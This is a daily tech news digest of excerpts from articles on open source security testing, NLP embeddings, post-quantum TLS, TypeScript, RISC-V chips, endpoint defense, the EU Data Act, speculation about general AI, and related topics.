Open Source Code: The Next Major Wave of Cyberattacks

When it comes to testing the resilience of your open source environment with tools, static code analysis is a good first step. Still, organizations must remember that this is only the first layer of testing. Static analysis refers to analyzing the source code before the actual software application or program goes live and addressing any discovered vulnerabilities. However, static analysis cannot detect all malicious threats that could be embedded in open source code. Additional testing in a sandbox environment should be the next step. Stringent code reviews, dynamic code analysis, and unit testing are other methods that can be leveraged. After scanning is complete, organizations must have a clear process to address any discovered vulnerabilities. Developers may be finding themselves against a release deadline, or the software patch may require refactoring the entire program and put a strain on timelines. This process should help developers address tough choices to protect the organization's security by giving clear next steps for addressing vulnerabilities and mitigating issues.

A guide to document embeddings using Distributed Bag-of-Words (DBOW) model

Beyond practising when things come to the real-world applications of NLP, machines are required to understand what is the context behind the text which surely is longer than just a single word. For example, we want to find cricket-related tweets from Twitter. We can start by making a list of all the words that are related to cricket and then we will try to find tweets that have any word from the list. This approach can work to an extent but what if any tweet related to cricket does not contain words from the list. Let’s take an example of any tweet that contains the name of an Indian cricketer without mentioning that he is an Indian cricketer. In our daily life, we may find many applications and websites like Facebook, twitter, stack overflow, etc which use this approach and fail to obtain the right results for us. To cope with such difficulties we may use document embeddings that basically learn a vector representation of each document from the whole world embeddings. This can also be considered as learning the vector representation in a paragraph setting instead of learning vector representation from the whole corpus.

Great Resignation or Great Redirection?

All this Great Resignation talk has many panicking and being reactive. We definitely shouldn’t ignore it, but we should seek to understand what is happening and why. And what the implications are for the future. The truly historical event is the revolution in how people conceive of work and its relationship to other life priorities. Even within that, there are distinctively different categories. We know service workers in leisure and hospitality got hit disproportionately hard by the pandemic. These people unexpectedly found themselves jobless, unsure how they would pay their bills and survive. Being resilient and hard-working, many — like my Uber driver — found gigs doing delivery, rideshare or other jobs giving greater flexibility and autonomy. These jobs also provided better pay than traditional service roles. Now, with their former jobs calling for their return, this group of workers has the ability to choose for themselves what they want. When Covid displaced office workers to their homes, they were bound to realize it was nice to not have that commute or the road warrior travel.

The post-quantum state: a taxonomy of challenges

While all the data seems to suggest that replacing classical cryptography by post-quantum cryptography in the key exchange phase of TLS handshakes is a straightforward exercise, the problem seems to be much harder for handshake authentication (or for any protocol that aims to give authentication, such as DNSSEC or IPsec). The majority of TLS handshakes achieve authentication by using digital signatures generated via advertised public keys in public certificates (what is called “certificate-based” authentication). Most of the post-quantum signature algorithms currently being considered for standardization in the NIST post-quantum process, have signatures or public keys that are much larger than their classical counterparts. Their operations’ computation time, in the majority of cases, is also much bigger. It is unclear how this will affect the TLS handshake latency and round-trip times, though we have a better insight now in respect to which sizes can be used. We still need to know how much slowdown will be acceptable for early adoption.

An overview of the blockchain development lifecycle

Databases developed with blockchain technologies are notoriously difficult to hack or manipulate, making them a perfect space for storing sensitive data. Blockchain software development requires an understanding of how blockchain technology works. To learn blockchain development, developers must be familiar with interdisciplinary concepts, for example, with cryptography and with popular blockchain programming languages like Solidity. A considerable amount of blockchain development focuses on information architecture, that is, how the database is actually to be structured and how the data to be distributed and accessed with different levels of permissions. ... Determine if the blockchain will include specific permissions for targeted user groups or if it will comprise a permissionless network. Afterward, determine whether the application will require the use of a private or public blockchain network architecture. Also consider the hybrid consortium, or public permissioned blockchain architecture. With a public permissioned blockchain, a participant can only add information with the permission of other registered participants.

How TypeScript Won Over Developers and JavaScript Frameworks

Microsoft’s emphasis on community also extends to developer tooling; another reason the Angular team cited for their decision to adopt the language. Microsoft’s own VS Code naturally has great support for TypeScript, but the TypeScript Language Server provides a common set of editor operations — like statement completions, signature help, code formatting, and outlining. This simplifies the job for vendors of alternative IDEs, such as JetBrains with WebStorm. Ekaterina Prigara, WebStorm project manager at JetBrains, told the New Stack that “this integration works side-by-side with our own support of TypeScript – some of the features of the language support are powered by the server, whilst others, e.g. most of the refactorings and the auto import mechanism, by the IDE’s own support.” The details of the integration are quite complex. Continued Prigara, “Completion suggestions from the server are shown but they could, in some cases, be enhanced with the IDE’s suggestions. It’s the same with the error detection and quick fixes. Formatting is done by the IDE. Inferred types shown on hover, if I’m not mistaken, come from the server. ...”

Developing and Testing Services Among a Sea of Microservices

The first option is to take all of the services that make up the entire application and put them on your laptop. This may work well for a smaller application, but if your application is large or has a large number of services, this solution won’t work very well. Imagine having to install, update, and manage 500, 1,000, or 5,000 services in your development environment on your laptop. When a change is made to one of those services, how do you get it updated? ... The second option solves some of these issues. Imagine having the ability to click a button and deploy a private version of the application in a cloud-based sandbox accessible only to you. This sandbox is designed to look exactly like your production environment. It may hopefully even use the same Terraform configurations to create the infrastructure and get it all connected, but it will use smaller cloud instances and fewer instances, so it won’t cost as much to run. Then, you can link your service running on your laptop to this developer-specific cloud setup and make it look like it’s running in a production environment.

Quote for the day:

"Courage is leaning into the doubts and fears to do what you know is right even when it doesn't feel natural or safe." -- Lee Ellis

Daily Tech Digest - February 26, 2022

How To Study and Learn Complex Software Engineering Concepts

Chunking is a powerful technique to learn new concepts by breaking big and complex subjects down into smaller, manageable units that represent the core concepts you need to master. Let’s say you would like to start your Data Science journey. Grab a book or find a comprehensive online curriculum on the subject and begin by scanning the table of contents and skim-reading the chapters by browsing the headers, sub-headers and illustrations. This allows you to get a feel of what material you are about to explore and make mental observations on how it is organised as well as start appreciating what the big picture looks like, so you can then fill in the details later. After this first stage, you need to start learning the ins and outs of the individual chunks. It is not as intimidating as you originally thought, as you have already formed an idea of what you will be studying. So, carrying on our previous example, you can go through the book chapters in-depth, and then supplement your knowledge by looking at Wikipedia, watching video tutorials, finding online resources, and taking extensive notes along the way.

RISC-V AI Chips Will Be Everywhere

The adoption of RISC-V, a free and open-source computer instruction set architecture first introduced in 2010, is taking off like a rocket. And much of the fuel for this rocket is coming from demand for AI and machine learning. According to the research firm Semico, the number of chips that include at least some RISC-V technology will grow 73.6 percent per year to 2027, when there will be some 25 billion AI chips produced, accounting for US $291 billion in revenue. The increase from what was still an upstart idea just a few years ago to today is impressive, but for AI it also represents something of a sea change, says Dave Ditzel, whose company Esperanto Technologies has created the first high-performance RISC-V AI processor intended to compete against powerful GPUs in AI-recommendation systems. According to Ditzel, during the early mania for machine learning and AI, people assumed general-purpose computer architectures—x86 and Arm—would never keep up with GPUs and more purpose-built accelerator architectures.

Sustainable architectures in a world of Agile, DevOps, and cloud

Driving architectural decisions is an essential activity in Continuous Architecture, and architectural decisions are the primary unit of work of a practitioner. Almost every architectural decision involves tradeoffs. For example, a decision made to optimize the implementation of a quality attribute requirement such as performance may negatively impact the implementation of other quality attributes, such as usability or maintainability. An architectural decision made to accelerate the delivery of a software system may increase technical debt, which needs to be “repaid” at some point in the future and may impact the sustainability of the system. Finally, all architectural decisions affect the cost of the system, and compromises may need to be made in order to meet the budget allocated to that system. All tradeoffs are reflected in the executable code base. Tradeoffs often are the least unfavorable ones rather than the optimal ones because of constraints beyond the team’s control, and decisions often need to be adjusted based on the feedback received from the system stakeholders.

6 Cyber-Defense Steps to Take Now to Protect Your Company

Modern device management is an essential part of increasing security in remote and hybrid work environments. A unified endpoint management (UEM) approach fully supports bring-your-own-device (BYOD) initiatives while maximizing user privacy and securing corporate data at the same time. UEM architectures usually include the ability to easily onboard and configure device and application settings at scale, establish device hygiene with risk-based patch management and mobile threat protection, monitor device posture and ensure compliance, identify and remediate issues quickly and remotely, automate software updates and OS deployments, and more. Choose a UEM solution with management capabilities for a wide range of operating systems, and one that is available both on-premises and via software-as-a-service (SaaS). ... Companies should look to combat device vulnerabilities (jailbroken devices, vulnerable OS versions, etc.), network vulnerabilities and application vulnerabilities (high security risk assessment, high privacy risk assessment, suspicious app behavior, etc.).

Europe proposes rules for fair access to connected device data

The Data Act looks to be a key component of the EU’s response to that threat. ... Secondly, the Commission is concerned about abusive contractual terms being imposed on smaller companies by more powerful platforms and market players to, essentially, extract the less powerful company’s most valuable data — so the Data Act will bring in a “fairness test” with the goal of protecting SMEs against unfair contractual terms. The legislation will stipulate a list of unilaterally imposed contractual clauses that are deemed or presumed to be unfair — such as a clause that states a company can unilaterally interpret the terms of the contract — and those that do not pass the test will be not be binding on SMEs. The Commission says it will also develop and recommend non-binding model contractual terms, saying these standard clauses will help SMEs negotiate “fairer and balanced data sharing contracts with companies enjoying a significantly stronger bargaining position” Some major competition complaints lodged against tech giants in the EU have concerned their access to third party data, such as the investigation into Amazon’s use of merchants data

Mind of its own: Will “general AI” be like an alien invasion?

Yes, we will have created a rival and yet we may not recognize the dangers right away. In fact, we humans will most likely look upon our super-intelligent creation with overwhelming pride — one of the greatest milestones in recorded history. Some will compare it to attaining godlike powers of being able to create thinking and feeling creatures from scratch. But soon it will dawn on us that these new arrivals have minds of their own. They will surely use their superior intelligence to pursue their own goals and aspirations, driven by their own needs and wants. It is unlikely they will be evil or sadistic, but their actions will certainly be guided by their own values, morals, and sensibilities, which will be nothing like ours. Many people falsely assume we will solve this problem by building AI systems in our own image, designing technologies that think and feel and behave just like we do. This is unlikely to be the case. Artificial minds will not be created by writing software with carefully crafted rules that make them behave like us.

5 ITSM hurdles and how to overcome them

Unclear communication makes it far more difficult to explain the value of ITSM to the business, to properly organize ITSM efforts, to set expectations for its deployment and to secure proper funding for it. Hjortkjær suggests using the CMDB to map IT components to business applications, assign ownership of those applications to both IT and business sponsors, and ask those sponsors to explain the role of each application to the business, as well as how best to use it and eventually when to replace it. Thomas Smith, director of telecommunications and IT support at funeral goods and services provider Service Corp. International, recommends being candid about schedules. “One of the biggest mistakes we made in the past, and still make, is to say `We’re going to get it done in three months.’ Four months later, everyone is still hoping for three months,” he says. Understand any deficiencies in your ITSM tool or services, he recommends, “and tell the business process owners `We have a plan to address it.’” Calvo says the terms of SLAs, such as those it created using BMC’s HelixITSM platform, can help set expectations and reduce frustration from users who “think everything should be solved ASAP.”

Data Mapping Best Practices

Many applications share the same pattern of naming common fields on the frontend but under the hood, these same fields can have quite different labels. Consider the field “Customers”: in the source code of your company’s CRM, it might still have the label “customers”, but then your ERP system calls it “clients”, your finance tool calls it “customer” and the tool your organization uses for customer messaging will map it “users” altogether. This is one of the probably most common data mapping examples for this label conundrum. To add to the complexity, what if a two-field data output from one system is expected as a one-field data input in another or vice versa? This is what commonly happens with First Name / Last Name; a certain customer “Allan” “McGregor” from your eCommerce system will need to become “Allan McGregor” in your ERP. Or my favorite example: the potential customer email address submitted through your company’s website will need to become “first-name: Steven”, "last-name: Davis” and “company: Rangers” in your customer relationships management tool.

How to perform Named Entity Recognition (NER) using a transformer?

Named entities can be of different classes like Virat Kohli is the name of a person and Lenovo is the name of a company. The process of recognizing such entities with their class and specification can be considered as Named Entity Recognition. In traditional ways of performing NER, we mostly find usage of spacy and NLTK. There can be a variety of applications of NER in natural language processing. For example, we use this for summarizing information from the documents and search engine optimization, content recommendation, and identification of different Biomedical subparts processes. In this article, we aim to make the implementation of NER easy and using transformers like BERT we can do this. Implementation of NER will be performed using BERT, so we are required to know what BERT is, which we will explain in our next section. In one of the previous articles, we had a detailed introduction to BERT. BERT stands for Bidirectional Encoder Representations from Transformers. It is a famous transformer in the field of NLP. This transformer is a pre-trained transformer like the others.

Using artificial intelligence to find anomalies hiding in massive datasets

To learn the complex conditional probability distribution of the data, the researchers used a special type of deep-learning model called a normalizing flow, which is particularly effective at estimating the probability density of a sample. They augmented that normalizing flow model using a type of graph, known as a Bayesian network, which can learn the complex, causal relationship structure between different sensors. This graph structure enables the researchers to see patterns inartifi the data and estimate anomalies more accurately, Chen explains. “The sensors are interacting with each other, and they have causal relationships and depend on each other. So, we have to be able to inject this dependency information into the way that we compute the probabilities,” he says. This Bayesian network factorizes, or breaks down, the joint probability of the multiple time series data into less complex, conditional probabilities that are much easier to parameterize, learn, and evaluate.

Quote for the day:

"It's not about how smart you are--it's about capturing minds." -- Richie Norton